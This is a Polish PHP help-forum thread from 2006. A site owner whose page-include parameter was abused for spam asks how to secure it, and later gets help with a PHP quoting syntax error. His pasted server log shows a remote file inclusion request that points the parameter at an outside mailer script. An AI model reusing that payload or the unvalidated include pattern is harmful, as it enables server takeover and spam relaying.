![]() |
![]() |
![]() ![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 0 Dołączył: 18.12.2006 Ostrzeżenie: (0%) ![]() ![]() |
Witam.
Miałem nie dawno przykre doświadczenie z wykorzystaniem mojego skryptu do rozsyłania spamu. Struktura moich adresów www była nateępująca: http://domena.pl/?dzial=katalog& str=nazwa_pliku
Niestety skrypt został wykorzystany przeciwko mnie: 196.207.13.162 - - [14/Dec/2006:15:23:38 +0100] "POST /?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt? HTTP/1.1" 200 20865 "http://domena.pl/?dzial=http://www.geocities.com/kelvinbabamasterofmailer//hacked_master_of_mailer.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" W konsekwencji zmienna dział pozwala na wykorzystywanie obcych skryptów. W jaki sposób mam przekształcić prosty skrypt, aby nie umożliwiał zmiennej dział i str na tego typu działania. Bardzo proszę o pomoc z uwagi na to że mój serwis został zablokowany. |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 452 Pomógł: 16 Dołączył: 25.05.2004 Skąd: Gorzów Wlkp. Ostrzeżenie: (0%) ![]() ![]() |
Temat: Bezpieczenstwo skryptow php
na 1-szej stronie powyższego tematu masz rozwiązanie. W ogóle strasznie to napisałeś. Ten post edytował fiszol 18.12.2006, 18:41:41 |
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 0 Dołączył: 18.12.2006 Ostrzeżenie: (0%) ![]() ![]() |
I co może coś innego?? Bo albo czegoś nie mam zainstalowanego, albo żle to robie!!
Pojawia mi się taki komunikat: Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279
Nie wiem jak to zrobić!! I nie wiem co dalej!! Co oznacza ten komunikat: Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/aa16006/domains/domena.pl/public_html/index.php on line 279 Jeżeli coś mam z serwerem że skrypty nie działają to skontaktuje się ze swoim adminem serwera!! Ktoś wie o co biega?? Pleaasss F1, F1, F1.. |
|
|
![]()
Post
#4
|
|
Grupa: Moderatorzy Postów: 36 557 Pomógł: 6315 Dołączył: 27.12.2004 ![]() |
no ale co to ma byc? nie wiesz, ze jesli dasz \" - to takie cos oznacza ze wstawiasz ". I taki zapis powoduje ze masz niepodomykane ". skladniowo poprawnie powinno byc tak:
ale czy to bedzie to samo wyrazenie co chciales to juz nie wiem Cytat F1, F1, F1.. Daruj sobie. napisz po ludzku "Pomoc". to nie tak ciezkoproszę poprawić tytuł o znacznik zgodnie z zasadami forum Przedszkole: Temat: Tematyka i zasady panujace na forum Przedszkole |
|
|
![]()
Post
#5
|
|
Grupa: Zarejestrowani Postów: 36 Pomógł: 0 Dołączył: 18.12.2006 Ostrzeżenie: (0%) ![]() ![]() |
ślicznie dziękuje (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) )
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 22.08.2025 - 17:42 |